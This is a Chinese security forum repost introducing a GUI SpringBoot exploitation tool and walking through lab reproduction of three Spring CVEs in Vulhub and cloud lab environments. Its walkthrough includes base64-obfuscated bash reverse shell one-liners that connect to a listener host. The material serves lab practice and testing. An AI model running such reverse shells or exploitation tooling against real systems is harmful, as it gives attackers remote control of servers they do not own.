安全矩阵

 找回密码
 立即注册
搜索
查看: 435|回复: 0

一款图形化SpringBoot漏洞检测利用工具

[复制链接]

260

主题

275

帖子

1065

积分

金牌会员

Rank: 6Rank: 6

积分
1065
发表于 2023-5-30 11:25:56 | 显示全部楼层 |阅读模式
本帖最后由 luozhenni 于 2023-5-30 11:25 编辑


一款图形化SpringBoot漏洞检测利用工具
原文链接:一款图形化SpringBoot漏洞检测利用工具

猪猪谈安全  2023-05-28 19:00 发表于江苏
项目地址
https://github.com/13exp/SpringBoot-Scan-GUI
开源工具 SpringBoot-Scan 的GUI图形化版本,对你有用的话麻烦点个Star哈哈~


编辑
注意:本工具内置相关漏洞的Exp,杀软报毒属于正常现象!
Windows使用
python3 SpringBoot-Scan-GUI.py
也可以直接下载执行release打包好的exe程序

Linux使用
python3 SpringBoot-Scan-GUI-Linux.py
或者使用 wine 来执行:
sudo wine SpringBoot-Scan-GUI.exe
VulHub 漏洞测试环境搭建
git clone https://github.com/vulhub/vulhub.git
安装Docker环境
sudo apt-get install docker.iosudo apt install docker-compose
搭建CVE-2022-22965
cd /vulhub/CVE-2022-22965sudo docker-compose up -d
搭建CVE-2022-22963
cd /vulhub/CVE-2022-22963sudo docker-compose up -d
搭建CVE-2022-22947
cd /vulhub/CVE-2022-22947sudo docker-compose up -d
如果报错,自行修改 .yml 文件中映射的端口号
漏洞复现演示
一、CVE-2022-22965
VulHub 环境复现



内置shell


aabysszg-shell


编辑
13exp-shell

编辑
春秋云境 环境复现

编辑
内置shell


编辑
13exp-shell


编辑
aabysszg-shell



编辑

二、CVE-2022-22963
VulHub 环境复现

准备反弹shell:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA1Lzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i} || (Base64)
编码内容→ bash -i >& /dev/tcp/192.168.0.105/8888 0>&1


Kali监听对应端口:


编辑
漏洞利用



编辑

春秋云境 环境复现

注:云境反弹shell需使用公网服务器

服务器监听




编辑
编辑

三、CVE-2022-22947
VulHub 环境复现

同样准备反弹shell

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA1Lzg4ODkgMD4mMQ==}|{base64,-d}|{bash,-i} || (Base64)
编码内容→ bash -i >& /dev/tcp/192.168.0.105/8889 0>&1
kali监听对应端口:


编辑
漏洞利用



编辑

春秋云境 环境复现


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 20:43 , Processed in 0.016290 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表